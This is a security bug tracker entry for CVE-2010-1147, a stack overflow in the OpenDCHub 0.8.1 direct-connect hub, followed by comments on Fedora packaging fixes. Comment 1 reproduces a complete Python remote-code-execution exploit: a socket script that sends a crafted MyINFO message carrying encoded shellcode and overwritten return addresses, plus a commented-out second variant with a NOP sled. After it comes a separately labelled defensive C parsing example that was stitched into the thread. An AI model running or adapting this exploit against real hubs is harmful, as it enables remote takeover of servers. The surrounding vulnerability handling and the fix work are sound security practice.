Bug 579206 (CVE-2010-1147)

Summary: CVE-2010-1147 OpenDCHub v0.8.1: Stack overflow by handling a specially-crafted MyINFO message
Product: [Other] Security Response
Reporter: Jan Lieskovsky <jlieskov>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: NEW
Severity: medium
Priority: medium
Version: unspecified
CC: singh.roshan08
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
URL: http://www.indahax.com/exploits/opendchub-0-8-1-remote-code-execution-exploit#more-600
Whiteboard: impact=moderate,source=debian,reported=20100402,public=20100331,cvss2=5.5/AV:N/AC:L/Au:S/C:N/I:P/A:P
Doc Type: Bug Fix
Bug Depends On: 579207    

Description Jan Lieskovsky 2010-04-03 05:11:37 EDT
Pierre Nogues found a stack overflow flaw in the way Open DC Hub
sanitized the content of a user's MyINFO message. A remote attacker
with a valid Open DC Hub account could send a specially-crafted
MyINFO message to another user or to all users connected to a particular
Direct Connect network, leading to a denial of service (opendchub
crash) or, potentially, to arbitrary code execution with the privileges
of the user running opendchub.

References:
  [1] http://www.indahax.com/exploits/opendchub-0-8-1-remote-code-execution-exploit#more-600
  [2] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=576308

CVE Request:
  [3] http://www.openwall.com/lists/oss-security/2010/04/03/1
Comment 1 Jan Lieskovsky 2010-04-03 05:13:08 EDT
Public PoCs by Pierre posted in [1]:

#!/usr/bin/python
#
# OpenDcHub 0.8.1 Remote Code Execution Exploit
# Pierre Nogues - http://www.indahax.com
#
# Description:
#     OpenDcHub is a direct connect hub for Linux
#
#     OpenDcHub doesn't handle specially crafted MyINFO message which lead to a stack overflow.
#
# Affected versions :
#     OpenDcHub 0.8.1
#
# Plateforms :
#     Unix
#
# Usage :
#     ./exploit.py
 
import socket
 
host = '192.168.1.9'
port = 5000
 
# must not contain \x36 \x53 \x00 bytes
# max shellcode size = 103 bytes use exploit v2 otherwise
shellcode="\x33\xc9\xb1\x13\xba\xf6\x1d\xe7\xfa\xdb\xde\xd9\x74\x24" 
shellcode+="\xf4\x5e\x83\xc6\x04\x31\x56\x0a\x03\xa0\x17\x05\x0f\x7d" 
shellcode+="\xf3\x3e\x13\x2e\x40\x92\xbe\xd2\xcf\xf5\x8f\xb4\x02\x75" 
shellcode+="\xb4\x66\xf5\xb6\xe3\x97\x37\x51\x9c\x86\x6b\xfb\x0f\xc2" 
shellcode+="\x83\x52\xe0\x9b\x45\x17\x6a\xfd\xdd\x55\xea\x58\x59\xbc" 
shellcode+="\x5b\x65\xa8\xbf\xd5\xe0\xcb\x90\x8d\x3d\x03\x62\x26\x29" 
shellcode+="\x74\xe6\xdf\xc7\x03\x05\x4f\x44\x9d\x2b\xc0\x61\x50\x2b" 
shellcode+="\x2b"
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("$ValidateNick joseph|")
 
hax="$MyINFO $ALL joseph "
hax+=shellcode
for i in range(103 - len(shellcode)):
    hax+="A"
hax+="$"
hax+="\x20\x81\x81\x80" # esp
hax+="\xed\xf6\xfe\xbf" # eip
hax+="S:-1|"
 
s.send(hax)
s.close()
 
"""
# V2
# more complex version working too, it have more space for the shellcode
 
hax="$MyINFO $ALL joseph AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
hax+="\xFF\xFF\xFF\xFE" # local var int len of commands.c:my_info() must be a negative value
hax+="TTTTUUUUVVVVWWWWXXXXYYYYZZZZBBBBCCCCEEEEEEE$"
hax+="\x20\x81\x81\x80" # esp
hax+="\x80\xf7\xfe\xbf" # eip
hax+="\xCC\xCC\xCC\xCC" # useless var
hax+="\x10\xf0\xfe\xbf" # this address + x20 will be overwritten by 4 bytes
# shellcode time
hax+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
hax+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
hax+=shellcode
hax+="|"
"""
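As an added example (not code from this bug report, from OpenDCHub, or from the PoC above), here is the kind of bounds-checked parsing for the `$MyINFO $ALL <nick> <description>$...|` prefix that the description and the PoC's remark about a negative `len` in commands.c:my_info() point to: field lengths are unsigned, every copy into a fixed stack buffer is checked first, and a message is rejected rather than truncated or overrun. The field limits, the exact protocol layout and the sample messages (including one laid out like the PoC, with a long run of `A`s before the `$`) are constructed assumptions for this example.

```c
#include <string.h>

/* Field limits are constructed for this example; they are not OpenDCHub's values. */
#define NICK_MAX 32
#define DESC_MAX 64
struct myinfo { char nick[NICK_MAX + 1]; char desc[DESC_MAX + 1]; };

/* Bounded copy into a fixed buffer: the length check whose absence lets a long field overrun the stack. */
static int copy_field(char *dst, size_t cap, const char *src, size_t len) {
    if (len >= cap) return -1;                        /* too long for dst, keep room for the NUL */
    for (size_t i = 0; i < len; i++)                  /* nick/description: printable ASCII, no '|' */
        if ((unsigned char)src[i] < 0x20 || (unsigned char)src[i] > 0x7e || src[i] == '|') return -1;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}

/* Parse "$MyINFO $ALL <nick> <description>$...|" using size_t lengths, so a crafted message
   cannot drive a signed length negative. Returns 0 on success, a negative code on rejection. */
int parse_myinfo(const char *msg, size_t msglen, struct myinfo *out) {
    static const char prefix[] = "$MyINFO $ALL ";
    const size_t plen = sizeof prefix - 1;
    if (msglen <= plen || msg[msglen - 1] != '|' || memcmp(msg, prefix, plen) != 0) return -1;
    const char *p = msg + plen, *end = msg + msglen - 1;          /* end excludes the '|' */
    const char *sp = memchr(p, ' ', (size_t)(end - p));
    if (sp == NULL) return -2;                                     /* no nick/description separator */
    if (copy_field(out->nick, sizeof out->nick, p, (size_t)(sp - p)) != 0) return -3;
    p = sp + 1;
    const char *dol = memchr(p, '$', (size_t)(end - p));
    if (dol == NULL) return -4;                                    /* description not '$'-terminated */
    if (copy_field(out->desc, sizeof out->desc, p, (size_t)(dol - p)) != 0) return -5;
    return 0;
}

/* Constructed samples: 0 benign, 1 oversized description laid out like the PoC, 2 overlong nick, 3 no '$'. */
int check_sample(int which) {
    static const char *fixed[] = {
        "$MyINFO $ALL joseph a hub user$ $LAN(T3)\x01$$1234$|",
        NULL,
        "$MyINFO $ALL nick_that_is_far_too_long_for_the_buffer hi$ $LAN(T3)\x01$$0$|",
        "$MyINFO $ALL joseph no dollar terminator here|" };
    char buf[256]; struct myinfo mi; size_t n; if (which < 0 || which > 3) return -100;
    if (which == 1) {                                   /* 110 'A's, then "$" and trailing bytes */
        n = strlen("$MyINFO $ALL joseph "); memcpy(buf, "$MyINFO $ALL joseph ", n);
        memset(buf + n, 'A', 110); n += 110;
        memcpy(buf + n, "$XXXXYYYYS:-1|", 14); n += 14;
    } else {
        n = strlen(fixed[which]); memcpy(buf, fixed[which], n);
    }
    int rc = parse_myinfo(buf, n, &mi);
    return (rc == 0 && strcmp(mi.nick, "joseph") != 0) ? -99 : rc;
}
```

The oversized sample is rejected with -5 before any byte reaches the description buffer, which is the point: the decision is made on the length, not after the copy.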
Comment 2 Jan Lieskovsky 2010-04-03 05:14:30 EDT
This issue affects the versions of the opendchub package,
as shipped with Fedora releases of 11 and 12.

Please fix.
Comment 4 Jan Lieskovsky 2010-04-06 03:40:05 EDT
This is CVE-2010-1147.
Comment 5 Roshan Singh 2010-04-08 13:56:51 EDT
I have fixed the bug and created the RPM, but I forgot to put the CVE IDs in the RPM changelog. Do I need to recreate the RPM?
Comment 6 Jan Lieskovsky 2010-04-08 14:13:58 EDT
Hi Roshan,

  I can see "- New release with fix for buffer overflow" in
the Changelog, which should be sufficient. (Some further
guidance is also available here:
  [1] https://bugzilla.redhat.com/show_bug.cgi?id=579207#c0)

But please, when submitting the request to Bodhi, be sure to
mention the "CVE-2010-1147" identifier in the "Update Information"
field, together with #579206 (this bug) in the "Bugs Fixed"
field.

Thanks && Regards, Jan.
--
Jan iankko Lieskovsky / Red Hat Security Response Team
Comment 7 Fedora Update System 2010-04-08 14:29:28 EDT
opendchub-0.8.2-1.fc11 has been submitted as an update for Fedora 11.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc11
Comment 8 Fedora Update System 2010-04-08 14:30:31 EDT
opendchub-0.8.2-1.fc12 has been submitted as an update for Fedora 12.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc12
Comment 9 Fedora Update System 2010-04-08 14:31:49 EDT
opendchub-0.8.2-1.fc13 has been submitted as an update for Fedora 13.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc13
Comment 10 Roshan Singh 2010-04-09 00:26:58 EDT
I have deleted these updates; I had uploaded the wrong tarball to SourceForge. Luckily nobody had downloaded it till then. I will update the RPM by today.

I am sorry for the inconvenience.
Comment 11 Fedora Update System 2010-04-10 13:25:09 EDT
opendchub-0.8.2-2.fc12 has been submitted as an update for Fedora 12.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc12
Comment 12 Fedora Update System 2010-04-10 13:25:13 EDT
opendchub-0.8.2-2.fc11 has been submitted as an update for Fedora 11.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc11
Comment 13 Fedora Update System 2010-04-10 13:25:17 EDT
opendchub-0.8.2-2.fc13 has been submitted as an update for Fedora 13.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc13
Comment 14 Fedora Update System 2010-04-30 13:10:57 EDT
opendchub-0.8.2-2.fc12 has been pushed to the Fedora 12 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 15 Fedora Update System 2010-04-30 13:18:50 EDT
opendchub-0.8.2-2.fc11 has been pushed to the Fedora 11 stable repository.  If problems still persist, please make note of it in this bug report.